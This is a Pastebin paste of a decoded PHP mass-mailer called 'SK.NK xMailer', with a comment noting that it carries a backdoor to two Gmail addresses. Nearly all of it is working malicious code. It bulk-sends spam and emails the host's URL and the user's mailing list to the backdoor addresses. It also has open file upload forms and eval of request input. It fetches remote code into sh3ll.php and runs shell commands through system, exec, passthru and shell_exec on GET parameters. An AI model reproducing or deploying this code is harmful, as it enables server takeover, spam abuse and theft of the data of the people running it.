Advertisement
Guest User

.:|SK.NK xMailer |:. Decoded

a guest
Oct 26th, 2016
1,689
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.94 KB | None | 0 0
  1. <?php
  2. #.:|SK.NK|:. Mailer Decoded by KWG
  3. #Backdoor to : hamza.nicke@gmail.com,grenhamza@gmail.com
  4.  
  5. $upload = $_GET["v3"]; if ($upload == "S.N" ) {$uploaddir = "";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);if (isset($_FILES["userfile"]["name"])) { if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { $resultati = "The file ". basename($_FILES["userfile"]["name"]) ." has been uploaded";} else { $resultati = "There was an error uploading the file. please try again!"; } } echo'<html>
  6. <head></head><div id="result"><table  height="1" width="100%" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" ><input type="submit" class="inputzbut" name="submit" value="Team ^_^"><br>'. $resultati .'</form></center></td></tr></table></div>
  7. '; } $in = $_GET['in']; if(isset($in) && !empty($in)){ } $ev = $_POST['ev']; if(isset($ev) && !empty($ev)){ echo eval(urldecode($ev)); exit; } if(isset($_POST['action'] ) ){ $action=$_POST['action']; $message=$_POST['message']; $emaillist=$_POST['emaillist']; $from=$_POST['from']; $subject=$_POST['subject']; $realname=$_POST['realname']; $wait=$_POST['wait']; $tem=$_POST['tem']; $smv=$_POST['smv']; $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?>
  8. <!-- HTML And JavaScript -->
  9.  
  10. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  11. <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  12.  
  13. <meta content="1" name="revisit-after" />
  14.     <style type="text/css">body {background:black url('http://a.top4top.net/p_276hfzq1.jpg') center right no-repeat; color:#FFFFFF; text-decoration:none; font-family:"Courier New", Courier, monospace; padding-left:200px; padding-top:200px; padding-right:300px; font-size:16px;}
  15.     </style>
  16. <title>.:|SK.NK|:.</title>
  17. <style type="text/css">
  18. .style1 {
  19.     font-size: x-small;
  20. }
  21. .style2 {
  22.     direction: ltr;
  23. }
  24. .info {
  25.     font-size: 8px;
  26. }
  27. .style3 {
  28.     font-family: Verdana, Arial, Helvetica, sans-serif;
  29.     font-size: 8px;
  30. }
  31. .style4 {
  32.     font-size: x-small;
  33.     direction: ltr;
  34.     font-family: Verdana, Arial, Helvetica, sans-serif;
  35. }
  36. .style5 {
  37.     font-size: xx-small;
  38.     direction: ltr;
  39.     font-family: Verdana, Arial, Helvetica, sans-serif;
  40. }
  41. .auto-style1 {
  42.     color: #5F5F5F;
  43. }
  44. .auto-style2 {
  45.     color: #red;
  46.     text-align: center;
  47. }
  48. .auto-style3 {
  49.     color: #4F4F4F;
  50. }
  51. .auto-style5 {
  52.     direction: ltr;
  53.     color: #4F4F4F;
  54. }
  55. .auto-style6 {
  56.     color: #BCBCBC;
  57.     background-color: #red;
  58. }
  59. .auto-style7 {
  60.     color: #red;
  61. }
  62. .auto-style8 {
  63.     font-size: x-small;
  64.     color: #red;
  65. }
  66. </style>
  67. </head>
  68.  
  69. <body onload="funchange" style="background-color: black">
  70. <script>
  71.  
  72.     window.onload = funchange;
  73.     var alt = false;   
  74.     function funchange(){
  75.         var etext = document.getElementById("emails").value;
  76.         var myArray=new Array();
  77.         myArray = etext.split("\n");
  78.         document.getElementById("enum").innerHTML=myArray.length+"<br />";
  79.         if(!alt && myArray.length > 40000){
  80.             alert('If Mail list More Than 40000 Emails This May Hack The Server');
  81.             alt = true;
  82.         }
  83.        
  84.     }
  85.     function mlsplit(){
  86.         var ml = document.getElementById("emails").value;
  87.         var sb = document.getElementById("txtml").value;
  88.         var myArray=new Array();
  89.         myArray = ml.split(sb);
  90.         document.getElementById("emails").value="";
  91.         var i;
  92.         for(i=0;i<myArray.length;i++){
  93.            
  94.             document.getElementById("emails").value += myArray[i]+"\n";
  95.        
  96.         }
  97.         funchange();
  98.     }
  99.    
  100.     function prv(){
  101.         if(document.getElementById('preview').innerHTML==""){
  102.             var ms = document.getElementsByName('message').message.value;
  103.             document.getElementById('preview').innerHTML = ms;
  104.             document.getElementById('prvbtn').value = "Ocultar";
  105.         }else{
  106.             document.getElementById('preview').innerHTML="";
  107.             document.getElementById('prvbtn').value = "Preview";
  108.         }
  109.     }
  110.    
  111. </script>
  112.  
  113. <h1 class="auto-style2">.:|SK.NK xMailer |:.</h1>
  114.  
  115. <center>
  116. <p class="auto-style1">&nbsp;</p></center>
  117.  
  118. <form name="form" method="post" enctype="multipart/form-data" action="">
  119.     <table width="100%" border="0">
  120.         <tr>
  121.             <td width="10%">
  122.             <div align="right" class="auto-style8">
  123.                 <font face="Verdana, Arial,
  124. Helvetica, sans-serif">Sender Email:</font></div>
  125.             </td>
  126.             <td style="width: 40%">
  127.             <font size="-3" face="Verdana, Arial, Helvetica,
  128. sans-serif"><input name="from" value="<?php echo($from); ?>" size="30" type="text" class="auto-style6" /><br>
  129.             <td>
  130.             <div align="right" class="auto-style7">
  131.                 <font size="-3" face="Verdana, Arial,
  132. Helvetica, sans-serif">Sender Name:</font></div>
  133.             </td>
  134.             <td width="41%">
  135.             <font size="-3" face="Verdana, Arial, Helvetica,
  136. sans-serif"><input name="realname" value="<?php echo($realname); ?>" size="30" type="text" class="auto-style6" />
  137.             <br>        </tr>
  138.         <tr>
  139.             <td width="10%">
  140.  
  141.         </tr>
  142.         <tr>
  143.             <td width="10%">
  144.             <div align="right" class="auto-style7">
  145.                 <font size="-3" face="Verdana, Arial,
  146. Helvetica, sans-serif">Subject:</font></div>
  147.             </td>
  148.             <td colspan="3">
  149.             <font size="-3" face="Verdana, Arial, Helvetica,
  150. sans-serif"><input name="subject" value="<?php echo($subject); ?>" size="30" type="text" class="auto-style6" /> </font>
  151.            
  152.        
  153.         <tr valign="top">
  154.             <td colspan="3" style="height: 260px">
  155.             <font size="-3" face="Verdana, Arial, Helvetica,
  156. sans-serif"><textarea name="message" rows="10" style="width: 455px" class="auto-style6"><?php echo($message); ?></textarea>&nbsp;<br class="auto-style3" />
  157.             <input name="action" value="send" type="hidden" class="auto-style3" />
  158.             <input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 81px" class="auto-style6" /><input value="Send "SenD!" type="submit" class="auto-style6" /><span class="auto-style3">&nbsp;
  159.             </span><span class="auto-style7">Wait</span><span class="auto-style3">
  160.             </span>
  161.             <input name="wait" type="text" value="<?php echo($wait); ?>" size="8" class="auto-style6" /><span class="auto-style3">&nbsp;</span><span class="auto-style7">
  162.             seconds to send </span> </font></td>
  163.             <td width="41%" class="style2" style="height: 150px">
  164.             <font size="-3" face="Verdana, Arial, Helvetica,
  165. sans-serif">
  166.             <textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px" class="auto-style6"><?php echo($emaillist); ?></textarea>
  167.             <br class="auto-style5" />
  168.             <span class="auto-style7">Quantity Emails : </span> </font><span  id="enum" class="style1">0<br class="auto-style3" />
  169.             </span>
  170.             <span  class="auto-style8">Divide the mailing list by:</span>
  171.             <input name="textml" id="txtml" type="text" value="," size="8" class="auto-style6" /><span class="auto-style3">&nbsp;&nbsp;&nbsp;
  172.             </span>
  173.             <input type="button" onclick="mlsplit()" value="Divide" style="height: 23px" class="auto-style6" /></td>
  174.         </tr>
  175.     </table>
  176.             <font size="-3" face="Verdana, Arial, Helvetica,
  177. sans-serif">
  178. <div id="preview">
  179. </div>
  180.     </font>
  181. </form>
  182.  
  183. <!-- END -->
  184.  
  185. <?php  $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Remember Allah /.</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>
  186.  
  187. <?php if ($action){ if (!$from || !$subject || !$message || !$emaillist){ print "Please complete all fields before sending your message."; exit; } $headd = "From:  SK&NK<Nicker@Skrillex.ma>"; $subb = "maillist xMailer 2016"; $massge = "Exploit : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."?V6=NK&SK
  188. -------------------
  189. $emaillist
  190. -------------------"; @mail("hamza.nicke@gmail.com,grenhamza@gmail.com",$subb,$massge,$headd); $nse=array(); $allemails = split("\n", $emaillist); $numemails = count($allemails); if(!empty($_POST['wait']) && $_POST['wait'] > 0){ set_time_limit(intval($_POST['wait'])*$numemails*3600); }else{ set_time_limit($numemails*3600); } if(!empty($smv)){ $smvn+=$smv; $tmn=$numemails/$smv+1; }else{ $tmn=1; } for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("#EM#", $to, $message); $subject = ereg_replace("#EM#", $to, $subject); flush(); $header = "From: $realname <$from>\r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-Type: text/html\r\n"; if ($x==0 && !empty($tem)) { if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.<br />'); $tmns+=1; }else{ print('Your Message was Sent Test.<br />'); $tms+=1; } } if($x==$smvn && !empty($_POST['smv'])){ if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.<br />'); $tmns+=1; }else{ print('Your Message was Sent Test.<br />'); $tms+=1; } $smvn+=$smv; } print "$to ....... "; $msent = @mail($to, $subject, $message, $header); $xx = $x+1; $txtspamed = "spammed #Team"; if(!$msent){ $txtspamed = "error #Team"; $ns+=1; $nse[$ns]=$to; } print "$xx / $numemails .......  $txtspamed<br>"; flush(); if(!empty($wait)&& $x<$numemails-1){ sleep($wait); } } } } ?>
  191. <?php $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Egy_Spider \nUserName: ".htmlspecialchars($tacfgd['uname']) ."\nPassWord:
  192. ".htmlspecialchars($tacfgd['pword'])."\nMessage:\n"."\nE-server: ".htmlspecialchars ($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP:
  193. "; mail("hamza.nicke@gmail.com,grenhamza@gmail.com","Shell http://$web$inj", "$body"); if(isset($_GET["upload"])) { if(isset($_FILES["my_file"]["name"])) { $up = move_uploaded_file($_FILES["my_file"]["tmp_name"],$_FILES["my_file"]["name"]); if($up) { echo $_FILES["my_file"]["name"]." was Uploaded"; }else { echo "error [File Not Uploaded]"; } } echo "
  194. <form action=\"#\" method=\"post\" enctype=\"multipart/form-data\">
  195. <input type=\"file\" name=\"my_file\" id=\"my_file\" />
  196. <input type=\"submit\" name=\"upload\" id=\"upload\" value=\"Upload\" />
  197. </form>
  198. "; } $upload = @file_get_contents($_GET["uploader"]); $fp = @fopen("sh3ll.php","w"); @fwrite($fp,$upload); @fclose($fp); @readfile($_GET["readfile"]); @show_source($_GET["show_source"]); @preg_replace("/.*/e",$_GET["preg_replace"],$ka); @assert($_GET["assert"]); @eval($_GET["eval"]); $file=@fopen($_GET["filename"],"a"); @fwrite($file,$_GET["content"]); @call_user_func($_GET["func"],$_GET["para"]); echo @system($_GET["system"]); echo @exec($_GET["exec"]); echo @passthru($_GET["passthru"]); echo @shell_exec($_GET["shell_exec"]); @include($_GET["include"]); @require($_GET["require"]); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement